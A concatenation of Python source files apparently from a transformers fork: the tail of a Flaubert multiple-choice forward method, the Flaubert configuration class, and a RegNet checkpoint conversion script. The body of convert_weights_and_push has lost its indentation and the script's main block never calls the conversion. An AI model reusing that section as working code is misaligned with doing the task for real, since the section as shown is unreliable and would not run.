        input_ids: Optional[torch.Tensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        langs: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
        lengths: Optional[torch.Tensor] = None,
        cache: Optional[Dict[str, torch.Tensor]] = None,
        head_mask: Optional[torch.Tensor] = None,
        inputs_embeds: Optional[torch.Tensor] = None,
        labels: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, MultipleChoiceModelOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the multiple choice classification loss. Indices should be in `[0, ...,
            num_choices-1]` where `num_choices` is the size of the second dimension of the input tensors. (See
            `input_ids` above)
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1]
        # Flatten (batch_size, num_choices, seq_len) -> (batch_size * num_choices, seq_len)
        # so every choice runs through the encoder as an independent sequence.
        input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None
        attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None
        token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None
        position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None
        langs = langs.view(-1, langs.size(-1)) if langs is not None else None
        inputs_embeds = (
            inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1))
            if inputs_embeds is not None
            else None
        )
        # `lengths` cannot survive the flattening above, so it is dropped with a warning.
        if lengths is not None:
            logger.warning(
                "The `lengths` parameter cannot be used with the Flaubert multiple choice models. Please use the "
                "attention mask instead."
            )
            lengths = None
        transformer_outputs = self.transformer(
            input_ids=input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        output = transformer_outputs[0]
        logits = self.sequence_summary(output)
        logits = self.logits_proj(logits)
        # Un-flatten back to (batch_size, num_choices): one score per choice.
        reshaped_logits = logits.view(-1, num_choices)
        loss = None
        if labels is not None:
            # Cross-entropy over the choice dimension.
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(reshaped_logits, labels)
        if not return_dict:
            output = (reshaped_logits,) + transformer_outputs[1:]
            return ((loss,) + output) if loss is not None else output
        return MultipleChoiceModelOutput(
            loss=loss,
            logits=reshaped_logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )
|
27182812/ChatGLM-LLaMA-chinese-insturct | 11,706 | src/transformers/models/flaubert/configuration_flaubert.py | # coding=utf-8
# Copyright 2019-present CNRS, Facebook Inc. and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Flaubert configuration"""
from collections import OrderedDict
from typing import Mapping
from ...configuration_utils import PretrainedConfig
from ...onnx import OnnxConfig
from ...utils import logging
logger = logging.get_logger(__name__)
# Hub checkpoint name -> URL of its `config.json`; all checkpoints follow the
# same `resolve/main` layout, so the mapping is generated from the names.
FLAUBERT_PRETRAINED_CONFIG_ARCHIVE_MAP = {
    checkpoint: f"https://huggingface.co/{checkpoint}/resolve/main/config.json"
    for checkpoint in (
        "flaubert/flaubert_small_cased",
        "flaubert/flaubert_base_uncased",
        "flaubert/flaubert_base_cased",
        "flaubert/flaubert_large_cased",
    )
}
class FlaubertConfig(PretrainedConfig):
    """
    This is the configuration class to store the configuration of a [`FlaubertModel`] or a [`TFFlaubertModel`]. It is
    used to instantiate a FlauBERT model according to the specified arguments, defining the model architecture.
    Instantiating a configuration with the defaults will yield a similar configuration to that of the FlauBERT
    [flaubert/flaubert_base_uncased](https://huggingface.co/flaubert/flaubert_base_uncased) architecture.
    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.
    Args:
        pre_norm (`bool`, *optional*, defaults to `False`):
            Whether to apply the layer normalization before or after the feed forward layer following the attention in
            each layer (Vaswani et al., Tensor2Tensor for Neural Machine Translation. 2018)
        layerdrop (`float`, *optional*, defaults to 0.0):
            Probability to drop layers during training (Fan et al., Reducing Transformer Depth on Demand with
            Structured Dropout. ICLR 2020)
        vocab_size (`int`, *optional*, defaults to 30145):
            Vocabulary size of the FlauBERT model. Defines the number of different tokens that can be represented by
            the `inputs_ids` passed when calling [`FlaubertModel`] or [`TFFlaubertModel`].
        emb_dim (`int`, *optional*, defaults to 2048):
            Dimensionality of the encoder layers and the pooler layer.
        n_layers (`int`, *optional*, defaults to 12):
            Number of hidden layers in the Transformer encoder.
        n_heads (`int`, *optional*, defaults to 16):
            Number of attention heads for each attention layer in the Transformer encoder.
        dropout (`float`, *optional*, defaults to 0.1):
            The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
        attention_dropout (`float`, *optional*, defaults to 0.1):
            The dropout probability for the attention mechanism
        gelu_activation (`bool`, *optional*, defaults to `True`):
            Whether or not to use a *gelu* activation instead of *relu*.
        sinusoidal_embeddings (`bool`, *optional*, defaults to `False`):
            Whether or not to use sinusoidal positional embeddings instead of absolute positional embeddings.
        causal (`bool`, *optional*, defaults to `False`):
            Whether or not the model should behave in a causal manner. Causal models use a triangular attention mask in
            order to only attend to the left-side context instead of a bidirectional context.
        asm (`bool`, *optional*, defaults to `False`):
            Whether or not to use an adaptive log softmax projection layer instead of a linear layer for the prediction
            layer.
        n_langs (`int`, *optional*, defaults to 1):
            The number of languages the model handles. Set to 1 for monolingual models.
        use_lang_emb (`bool`, *optional*, defaults to `True`):
            Whether to use language embeddings. Some models use additional language embeddings, see [the multilingual
            models page](http://huggingface.co/transformers/multilingual.html#xlm-language-embeddings) for information
            on how to use them.
        max_position_embeddings (`int`, *optional*, defaults to 512):
            The maximum sequence length that this model might ever be used with. Typically set this to something large
            just in case (e.g., 512 or 1024 or 2048).
        embed_init_std (`float`, *optional*, defaults to 2048^-0.5):
            The standard deviation of the truncated_normal_initializer for initializing the embedding matrices.
        init_std (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices except the
            embedding matrices.
        layer_norm_eps (`float`, *optional*, defaults to 1e-12):
            The epsilon used by the layer normalization layers.
        bos_index (`int`, *optional*, defaults to 0):
            The index of the beginning of sentence token in the vocabulary.
        eos_index (`int`, *optional*, defaults to 1):
            The index of the end of sentence token in the vocabulary.
        pad_index (`int`, *optional*, defaults to 2):
            The index of the padding token in the vocabulary.
        unk_index (`int`, *optional*, defaults to 3):
            The index of the unknown token in the vocabulary.
        mask_index (`int`, *optional*, defaults to 5):
            The index of the masking token in the vocabulary.
        is_encoder(`bool`, *optional*, defaults to `True`):
            Whether or not the initialized model should be a transformer encoder or decoder as seen in Vaswani et al.
        summary_type (`string`, *optional*, defaults to "first"):
            Argument used when doing sequence summary. Used in the sequence classification and multiple choice models.
            Has to be one of the following options:
            - `"last"`: Take the last token hidden state (like XLNet).
            - `"first"`: Take the first token hidden state (like BERT).
            - `"mean"`: Take the mean of all tokens hidden states.
            - `"cls_index"`: Supply a Tensor of classification token position (like GPT/GPT-2).
            - `"attn"`: Not implemented now, use multi-head attention.
        summary_use_proj (`bool`, *optional*, defaults to `True`):
            Argument used when doing sequence summary. Used in the sequence classification and multiple choice models.
            Whether or not to add a projection after the vector extraction.
        summary_activation (`str`, *optional*):
            Argument used when doing sequence summary. Used in the sequence classification and multiple choice models.
            Pass `"tanh"` for a tanh activation to the output, any other value will result in no activation.
        summary_proj_to_labels (`bool`, *optional*, defaults to `True`):
            Used in the sequence classification and multiple choice models.
            Whether the projection outputs should have `config.num_labels` or `config.hidden_size` classes.
        summary_first_dropout (`float`, *optional*, defaults to 0.1):
            Used in the sequence classification and multiple choice models.
            The dropout ratio to be used after the projection and activation.
        start_n_top (`int`, *optional*, defaults to 5):
            Used in the SQuAD evaluation script.
        end_n_top (`int`, *optional*, defaults to 5):
            Used in the SQuAD evaluation script.
        mask_token_id (`int`, *optional*, defaults to 0):
            Model agnostic parameter to identify masked tokens when generating text in an MLM context.
        lang_id (`int`, *optional*, defaults to 0):
            The ID of the language used by the model. This parameter is used when generating text in a given language.
    """
    model_type = "flaubert"
    # Maps the generic `PretrainedConfig` attribute names onto Flaubert's
    # historical parameter names, so e.g. `config.hidden_size` works.
    attribute_map = {
        "hidden_size": "emb_dim",
        "num_attention_heads": "n_heads",
        "num_hidden_layers": "n_layers",
        "n_words": "vocab_size", # For backward compatibility
    }
    def __init__(
        self,
        pre_norm=False,
        layerdrop=0.0,
        vocab_size=30145,
        emb_dim=2048,
        n_layers=12,
        n_heads=16,
        dropout=0.1,
        attention_dropout=0.1,
        gelu_activation=True,
        sinusoidal_embeddings=False,
        causal=False,
        asm=False,
        n_langs=1,
        use_lang_emb=True,
        max_position_embeddings=512,
        embed_init_std=2048**-0.5,
        layer_norm_eps=1e-12,
        init_std=0.02,
        bos_index=0,
        eos_index=1,
        pad_index=2,
        unk_index=3,
        mask_index=5,
        is_encoder=True,
        summary_type="first",
        summary_use_proj=True,
        summary_activation=None,
        summary_proj_to_labels=True,
        summary_first_dropout=0.1,
        start_n_top=5,
        end_n_top=5,
        mask_token_id=0,
        lang_id=0,
        pad_token_id=2,
        bos_token_id=0,
        **kwargs,
    ):
        """Constructs FlaubertConfig."""
        self.pre_norm = pre_norm
        self.layerdrop = layerdrop
        self.vocab_size = vocab_size
        self.emb_dim = emb_dim
        self.n_layers = n_layers
        self.n_heads = n_heads
        self.dropout = dropout
        self.attention_dropout = attention_dropout
        self.gelu_activation = gelu_activation
        self.sinusoidal_embeddings = sinusoidal_embeddings
        self.causal = causal
        self.asm = asm
        self.n_langs = n_langs
        self.use_lang_emb = use_lang_emb
        self.layer_norm_eps = layer_norm_eps
        self.bos_index = bos_index
        self.eos_index = eos_index
        self.pad_index = pad_index
        self.unk_index = unk_index
        self.mask_index = mask_index
        self.is_encoder = is_encoder
        self.max_position_embeddings = max_position_embeddings
        self.embed_init_std = embed_init_std
        self.init_std = init_std
        self.summary_type = summary_type
        self.summary_use_proj = summary_use_proj
        self.summary_activation = summary_activation
        self.summary_proj_to_labels = summary_proj_to_labels
        self.summary_first_dropout = summary_first_dropout
        self.start_n_top = start_n_top
        self.end_n_top = end_n_top
        self.mask_token_id = mask_token_id
        self.lang_id = lang_id
        # Legacy configs may carry `n_words`; `attribute_map` aliases it to `vocab_size`.
        if "n_words" in kwargs:
            self.n_words = kwargs["n_words"]
        super().__init__(pad_token_id=pad_token_id, bos_token_id=bos_token_id, **kwargs)
class FlaubertOnnxConfig(OnnxConfig):
    @property
    def inputs(self) -> Mapping[str, Mapping[int, str]]:
        """Input tensor names mapped to their dynamic axes for ONNX export."""
        # Multiple-choice inputs carry an extra "choice" axis between batch and sequence.
        if self.task == "multiple-choice":
            axes = {0: "batch", 1: "choice", 2: "sequence"}
        else:
            axes = {0: "batch", 1: "sequence"}
        return OrderedDict([("input_ids", axes), ("attention_mask", axes)])
|
27182812/ChatGLM-LLaMA-chinese-insturct | 18,727 | src/transformers/models/regnet/convert_regnet_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert RegNet checkpoints from timm and vissl."""
import argparse
import json
from dataclasses import dataclass, field
from functools import partial
from pathlib import Path
from typing import Callable, Dict, List, Tuple
import timm
import torch
import torch.nn as nn
from classy_vision.models.regnet import RegNet, RegNetParams, RegNetY32gf, RegNetY64gf, RegNetY128gf
from huggingface_hub import cached_download, hf_hub_url
from torch import Tensor
from vissl.models.model_helpers import get_trunk_forward_outputs
from transformers import AutoFeatureExtractor, RegNetConfig, RegNetForImageClassification, RegNetModel
from transformers.utils import logging
# Show INFO-level progress messages while converting checkpoints.
logging.set_verbosity_info()
logger = logging.get_logger()
@dataclass
class Tracker:
    """Records the leaf modules executed during a forward pass of ``module``.

    A forward hook is registered on every submodule; hooks fire in execution
    order, so after calling the tracker ``traced`` lists the leaf operations
    in the order they ran. ``parametrized`` narrows that to modules holding
    learnable parameters.
    """

    module: nn.Module
    traced: List[nn.Module] = field(default_factory=list)
    handles: list = field(default_factory=list)

    def _forward_hook(self, m, inputs: Tensor, outputs: Tensor):
        # Record only leaf operations (modules with no children); Conv2d and
        # BatchNorm2d are kept explicitly as well.
        has_not_submodules = len(list(m.modules())) == 1 or isinstance(m, (nn.Conv2d, nn.BatchNorm2d))
        if has_not_submodules:
            self.traced.append(m)

    def __call__(self, x: Tensor):
        """Run ``module`` on ``x`` while tracing, then detach all hooks."""
        for m in self.module.modules():
            self.handles.append(m.register_forward_hook(self._forward_hook))
        try:
            self.module(x)
        finally:
            # Always remove the hooks — even if the forward pass raises — and
            # drop the stale handles so the tracker can be reused safely.
            for handle in self.handles:
                handle.remove()
            self.handles.clear()
        return self

    @property
    def parametrized(self):
        # Keep only modules with learnable params (non-empty state_dict).
        return [m for m in self.traced if len(m.state_dict()) > 0]
@dataclass
class ModuleTransfer:
    """Copies weights from ``src`` into ``dest`` by aligning traced leaf operations.

    Both modules are run on the same input; the parametrized leaf modules
    encountered (in execution order) are paired one-to-one and each source
    module's state dict is loaded into its destination counterpart.
    """

    src: nn.Module
    dest: nn.Module
    verbose: int = 1
    # Module *types* to ignore on the source / destination side when pairing.
    src_skip: List = field(default_factory=list)
    dest_skip: List = field(default_factory=list)
    raise_if_mismatch: bool = True

    def __call__(self, x: Tensor):
        """
        Transfer the weights of `self.src` to `self.dest` by performing a forward pass using `x` as input. Under the
        hood we tracked all the operations in both modules.
        """
        dest_traced = Tracker(self.dest)(x).parametrized
        src_traced = Tracker(self.src)(x).parametrized
        src_traced = [m for m in src_traced if type(m) not in self.src_skip]
        dest_traced = [m for m in dest_traced if type(m) not in self.dest_skip]
        if len(dest_traced) != len(src_traced) and self.raise_if_mismatch:
            # ValueError (still an Exception) instead of a bare Exception.
            raise ValueError(
                f"Numbers of operations are different. Source module has {len(src_traced)} operations while"
                f" destination module has {len(dest_traced)}."
            )
        for dest_m, src_m in zip(dest_traced, src_traced):
            dest_m.load_state_dict(src_m.state_dict())
            if self.verbose == 1:
                # Fixed typo: "Transfered" -> "Transferred".
                print(f"Transferred from={src_m} to={dest_m}")
class FakeRegNetVisslWrapper(nn.Module):
    """
    Fake wrapper for RegNet that mimics what vissl does without the need to pass a config file.
    """

    def __init__(self, model: nn.Module):
        super().__init__()
        feature_blocks: List[Tuple[str, nn.Module]] = []
        # - get the stem
        feature_blocks.append(("conv1", model.stem))
        # - get all the feature blocks
        for k, v in model.trunk_output.named_children():
            # Explicit raise instead of `assert`, which is stripped under `python -O`.
            if not k.startswith("block"):
                raise ValueError(f"Unexpected layer name {k}")
            # Stages are named "res2", "res3", ... (the stem occupies slot 1).
            block_index = len(feature_blocks) + 1
            feature_blocks.append((f"res{block_index}", v))
        self._feature_blocks = nn.ModuleDict(feature_blocks)

    def forward(self, x: Tensor):
        # Delegate to vissl's trunk runner to collect per-stage outputs.
        return get_trunk_forward_outputs(
            x,
            out_feat_keys=None,
            feature_blocks=self._feature_blocks,
        )
class NameToFromModelFuncMap(dict):
    """
    A Dictionary with some additional logic to return a function that creates the correct original model.
    """

    def convert_name_to_timm(self, x: str) -> str:
        # "regnet-x-002" -> "regnetx_002": fuse the first two dash-separated
        # segments, then append the remainder after an underscore.
        parts = x.split("-")
        return f"{parts[0]}{parts[1]}_{''.join(parts[2:])}"

    def __getitem__(self, x: str) -> Callable[[], Tuple[nn.Module, Dict]]:
        if x in self:
            # Explicit entries (e.g. SEER loaders) win over the timm fallback.
            return super().__getitem__(x)
        # default to timm!
        timm_name = self.convert_name_to_timm(x)
        return partial(lambda: (timm.create_model(timm_name, pretrained=True).eval(), None))
class NameToOurModelFuncMap(dict):
    """
    A Dictionary with some additional logic to return the correct hugging face RegNet class reference.
    """

    def __getitem__(self, x: str) -> Callable[[], nn.Module]:
        # SEER checkpoints without an ImageNet-1k head map to the bare backbone;
        # everything else gets the classification head.
        is_headless_seer = "seer" in x and "in1k" not in x
        return RegNetModel if is_headless_seer else RegNetForImageClassification
def manually_copy_vissl_head(from_state_dict, to_state_dict, keys: List[Tuple[str, str]]):
    """Copy selected tensors between state dicts, cloning each `from_key` into `to_key`.

    Mutates and returns `to_state_dict`.
    """
    for from_key, to_key in keys:
        # Clone so the destination does not alias the source tensor's storage.
        to_state_dict[to_key] = from_state_dict[from_key].clone()
        print(f"Copied key={from_key} to={to_key}")
    return to_state_dict
def convert_weight_and_push(
    name: str,
    from_model_func: Callable[[], nn.Module],
    our_model_func: Callable[[], nn.Module],
    config: RegNetConfig,
    save_directory: Path,
    push_to_hub: bool = True,
):
    """Convert one RegNet checkpoint and optionally push it to the Hub.

    Instantiates the original model and the HF model, trace-copies the weights
    across, verifies both produce matching outputs on a random input, then
    uploads the model and a feature extractor when `push_to_hub` is set.

    Args:
        name: Checkpoint name, e.g. `"regnet-y-320-seer-in1k"`.
        from_model_func: Zero-arg callable returning `(original_model, state_dict_or_None)`.
        our_model_func: Callable taking a `RegNetConfig` and returning the HF model.
        config: Configuration for the HF RegNet model.
        save_directory: Local directory used as the repo path when pushing.
        push_to_hub: Whether to upload the converted artifacts.
    """
    print(f"Converting {name}...")
    with torch.no_grad():
        from_model, from_state_dict = from_model_func()
        our_model = our_model_func(config).eval()
        # Mismatches are tolerated here because SEER heads are copied manually below.
        module_transfer = ModuleTransfer(src=from_model, dest=our_model, raise_if_mismatch=False)
        x = torch.randn((1, 3, 224, 224))
        module_transfer(x)
    if from_state_dict is not None:
        keys = []
        # for seer - in1k finetuned we have to manually copy the head
        if "seer" in name and "in1k" in name:
            keys = [("0.clf.0.weight", "classifier.1.weight"), ("0.clf.0.bias", "classifier.1.bias")]
        to_state_dict = manually_copy_vissl_head(from_state_dict, our_model.state_dict(), keys)
        our_model.load_state_dict(to_state_dict)
    our_outputs = our_model(x, output_hidden_states=True)
    our_output = (
        our_outputs.logits if isinstance(our_model, RegNetForImageClassification) else our_outputs.last_hidden_state
    )
    from_output = from_model(x)
    from_output = from_output[-1] if type(from_output) is list else from_output
    # now since I don't want to use any config files, vissl seer model doesn't actually have an head, so let's just check the last hidden state
    if "seer" in name and "in1k" in name:
        our_output = our_outputs.hidden_states[-1]
    assert torch.allclose(from_output, our_output), "The model logits don't match the original one."
    if push_to_hub:
        our_model.push_to_hub(
            repo_path_or_name=save_directory / name,
            commit_message="Add model",
            use_temp_dir=True,
        )
        # SEER checkpoints were trained at a higher resolution.
        size = 224 if "seer" not in name else 384
        # we can use the convnext one
        feature_extractor = AutoFeatureExtractor.from_pretrained("facebook/convnext-base-224-22k-1k", size=size)
        feature_extractor.push_to_hub(
            repo_path_or_name=save_directory / name,
            commit_message="Add feature extractor",
            use_temp_dir=True,
        )
        print(f"Pushed {name}")
def convert_weights_and_push(save_directory: Path, model_name: str = None, push_to_hub: bool = True):
filename = "imagenet-1k-id2label.json"
num_labels = 1000
expected_shape = (1, num_labels)
repo_id = "huggingface/label-files"
num_labels = num_labels
id2label = json.load(open(cached_download(hf_hub_url(repo_id, filename, repo_type="dataset")), "r"))
id2label = {int(k): v for k, v in id2label.items()}
id2label = id2label
label2id = {v: k for k, v in id2label.items()}
ImageNetPreTrainedConfig = partial(RegNetConfig, num_labels=num_labels, id2label=id2label, label2id=label2id)
names_to_config = {
"regnet-x-002": ImageNetPreTrainedConfig(
depths=[1, 1, 4, 7], hidden_sizes=[24, 56, 152, 368], groups_width=8, layer_type="x"
),
"regnet-x-004": ImageNetPreTrainedConfig(
depths=[1, 2, 7, 12], hidden_sizes=[32, 64, 160, 384], groups_width=16, layer_type="x"
),
"regnet-x-006": ImageNetPreTrainedConfig(
depths=[1, 3, 5, 7], hidden_sizes=[48, 96, 240, 528], groups_width=24, layer_type="x"
),
"regnet-x-008": ImageNetPreTrainedConfig(
depths=[1, 3, 7, 5], hidden_sizes=[64, 128, 288, 672], groups_width=16, layer_type="x"
),
"regnet-x-016": ImageNetPreTrainedConfig(
depths=[2, 4, 10, 2], hidden_sizes=[72, 168, 408, 912], groups_width=24, layer_type="x"
),
"regnet-x-032": ImageNetPreTrainedConfig(
depths=[2, 6, 15, 2], hidden_sizes=[96, 192, 432, 1008], groups_width=48, layer_type="x"
),
"regnet-x-040": ImageNetPreTrainedConfig(
depths=[2, 5, 14, 2], hidden_sizes=[80, 240, 560, 1360], groups_width=40, layer_type="x"
),
"regnet-x-064": ImageNetPreTrainedConfig(
depths=[2, 4, 10, 1], hidden_sizes=[168, 392, 784, 1624], groups_width=56, layer_type="x"
),
"regnet-x-080": ImageNetPreTrainedConfig(
depths=[2, 5, 15, 1], hidden_sizes=[80, 240, 720, 1920], groups_width=120, layer_type="x"
),
"regnet-x-120": ImageNetPreTrainedConfig(
depths=[2, 5, 11, 1], hidden_sizes=[224, 448, 896, 2240], groups_width=112, layer_type="x"
),
"regnet-x-160": ImageNetPreTrainedConfig(
depths=[2, 6, 13, 1], hidden_sizes=[256, 512, 896, 2048], groups_width=128, layer_type="x"
),
"regnet-x-320": ImageNetPreTrainedConfig(
depths=[2, 7, 13, 1], hidden_sizes=[336, 672, 1344, 2520], groups_width=168, layer_type="x"
),
# y variant
"regnet-y-002": ImageNetPreTrainedConfig(depths=[1, 1, 4, 7], hidden_sizes=[24, 56, 152, 368], groups_width=8),
"regnet-y-004": ImageNetPreTrainedConfig(
depths=[1, 3, 6, 6], hidden_sizes=[48, 104, 208, 440], groups_width=8
),
"regnet-y-006": ImageNetPreTrainedConfig(
depths=[1, 3, 7, 4], hidden_sizes=[48, 112, 256, 608], groups_width=16
),
"regnet-y-008": ImageNetPreTrainedConfig(
depths=[1, 3, 8, 2], hidden_sizes=[64, 128, 320, 768], groups_width=16
),
"regnet-y-016": ImageNetPreTrainedConfig(
depths=[2, 6, 17, 2], hidden_sizes=[48, 120, 336, 888], groups_width=24
),
"regnet-y-032": ImageNetPreTrainedConfig(
depths=[2, 5, 13, 1], hidden_sizes=[72, 216, 576, 1512], groups_width=24
),
"regnet-y-040": ImageNetPreTrainedConfig(
depths=[2, 6, 12, 2], hidden_sizes=[128, 192, 512, 1088], groups_width=64
),
"regnet-y-064": ImageNetPreTrainedConfig(
depths=[2, 7, 14, 2], hidden_sizes=[144, 288, 576, 1296], groups_width=72
),
"regnet-y-080": ImageNetPreTrainedConfig(
depths=[2, 4, 10, 1], hidden_sizes=[168, 448, 896, 2016], groups_width=56
),
"regnet-y-120": ImageNetPreTrainedConfig(
depths=[2, 5, 11, 1], hidden_sizes=[224, 448, 896, 2240], groups_width=112
),
"regnet-y-160": ImageNetPreTrainedConfig(
depths=[2, 4, 11, 1], hidden_sizes=[224, 448, 1232, 3024], groups_width=112
),
"regnet-y-320": ImageNetPreTrainedConfig(
depths=[2, 5, 12, 1], hidden_sizes=[232, 696, 1392, 3712], groups_width=232
),
# models created by SEER -> https://arxiv.org/abs/2202.08360
"regnet-y-320-seer": RegNetConfig(depths=[2, 5, 12, 1], hidden_sizes=[232, 696, 1392, 3712], groups_width=232),
"regnet-y-640-seer": RegNetConfig(depths=[2, 5, 12, 1], hidden_sizes=[328, 984, 1968, 4920], groups_width=328),
"regnet-y-1280-seer": RegNetConfig(
depths=[2, 7, 17, 1], hidden_sizes=[528, 1056, 2904, 7392], groups_width=264
),
"regnet-y-2560-seer": RegNetConfig(
depths=[3, 7, 16, 1], hidden_sizes=[640, 1696, 2544, 5088], groups_width=640
),
"regnet-y-10b-seer": ImageNetPreTrainedConfig(
depths=[2, 7, 17, 1], hidden_sizes=[2020, 4040, 11110, 28280], groups_width=1010
),
# finetuned on imagenet
"regnet-y-320-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 5, 12, 1], hidden_sizes=[232, 696, 1392, 3712], groups_width=232
),
"regnet-y-640-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 5, 12, 1], hidden_sizes=[328, 984, 1968, 4920], groups_width=328
),
"regnet-y-1280-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 7, 17, 1], hidden_sizes=[528, 1056, 2904, 7392], groups_width=264
),
"regnet-y-2560-seer-in1k": ImageNetPreTrainedConfig(
depths=[3, 7, 16, 1], hidden_sizes=[640, 1696, 2544, 5088], groups_width=640
),
"regnet-y-10b-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 7, 17, 1], hidden_sizes=[2020, 4040, 11110, 28280], groups_width=1010
),
}
names_to_ours_model_map = NameToOurModelFuncMap()
names_to_from_model_map = NameToFromModelFuncMap()
# add seer weights logic
    def load_using_classy_vision(checkpoint_url: str, model_func: Callable[[], nn.Module]) -> Tuple[nn.Module, Dict]:
        """Download a classy-vision checkpoint and load its trunk weights into `model_func()`.

        Returns the model in eval mode together with the (possibly empty) head state dict.
        Note: downloads are cached under `save_directory` (closure variable from the enclosing function).
        """
        files = torch.hub.load_state_dict_from_url(checkpoint_url, model_dir=str(save_directory), map_location="cpu")
        model = model_func()
        # check if we have a head, if yes add it
        model_state_dict = files["classy_state_dict"]["base_model"]["model"]
        # only the trunk weights are loaded into the model; heads are returned separately
        state_dict = model_state_dict["trunk"]
        model.load_state_dict(state_dict)
        return model.eval(), model_state_dict["heads"]
# pretrained
names_to_from_model_map["regnet-y-320-seer"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet32d/seer_regnet32gf_model_iteration244000.torch",
lambda: FakeRegNetVisslWrapper(RegNetY32gf()),
)
names_to_from_model_map["regnet-y-640-seer"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet64/seer_regnet64gf_model_final_checkpoint_phase0.torch",
lambda: FakeRegNetVisslWrapper(RegNetY64gf()),
)
names_to_from_model_map["regnet-y-1280-seer"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/swav_ig1b_regnet128Gf_cnstant_bs32_node16_sinkhorn10_proto16k_syncBN64_warmup8k/model_final_checkpoint_phase0.torch",
lambda: FakeRegNetVisslWrapper(RegNetY128gf()),
)
names_to_from_model_map["regnet-y-10b-seer"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet10B/model_iteration124500_conso.torch",
lambda: FakeRegNetVisslWrapper(
RegNet(RegNetParams(depth=27, group_width=1010, w_0=1744, w_a=620.83, w_m=2.52))
),
)
# IN1K finetuned
names_to_from_model_map["regnet-y-320-seer-in1k"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet32_finetuned_in1k_model_final_checkpoint_phase78.torch",
lambda: FakeRegNetVisslWrapper(RegNetY32gf()),
)
names_to_from_model_map["regnet-y-640-seer-in1k"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet64_finetuned_in1k_model_final_checkpoint_phase78.torch",
lambda: FakeRegNetVisslWrapper(RegNetY64gf()),
)
names_to_from_model_map["regnet-y-1280-seer-in1k"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet128_finetuned_in1k_model_final_checkpoint_phase78.torch",
lambda: FakeRegNetVisslWrapper(RegNetY128gf()),
)
names_to_from_model_map["regnet-y-10b-seer-in1k"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_10b_finetuned_in1k_model_phase28_conso.torch",
lambda: FakeRegNetVisslWrapper(
RegNet(RegNetParams(depth=27, group_width=1010, w_0=1744, w_a=620.83, w_m=2.52))
),
)
if model_name:
convert_weight_and_push(
model_name,
names_to_from_model_map[model_name],
names_to_ours_model_map[model_name],
names_to_config[model_name],
save_directory,
push_to_hub,
)
else:
for model_name, config in names_to_config.items():
convert_weight_and_push(
model_name,
names_to_from_model_map[model_name],
names_to_ours_model_map[model_name],
config,
save_directory,
push_to_hub,
)
return config, expected_shape
if __name__ == "__main__":

    def _str_to_bool(value: str) -> bool:
        """Parse a boolean command-line value.

        `argparse` with `type=bool` treats ANY non-empty string (including the
        literal "False") as True; this helper makes `--push_to_hub False` work.
        """
        return value.lower() not in {"false", "0", "no", ""}

    parser = argparse.ArgumentParser()
    # Required parameters
    parser.add_argument(
        "--model_name",
        default=None,
        type=str,
        help=(
            "The name of the model you wish to convert, it must be one of the supported regnet* architecture,"
            " currently: regnetx-*, regnety-*. If `None`, all of them will be converted."
        ),
    )
    parser.add_argument(
        "--pytorch_dump_folder_path",
        default=None,
        type=Path,
        required=True,
        help="Path to the output PyTorch model directory.",
    )
    parser.add_argument(
        "--push_to_hub",
        default=True,
        type=_str_to_bool,
        required=False,
        help="If True, push model and feature extractor to the hub.",
    )

    args = parser.parse_args()

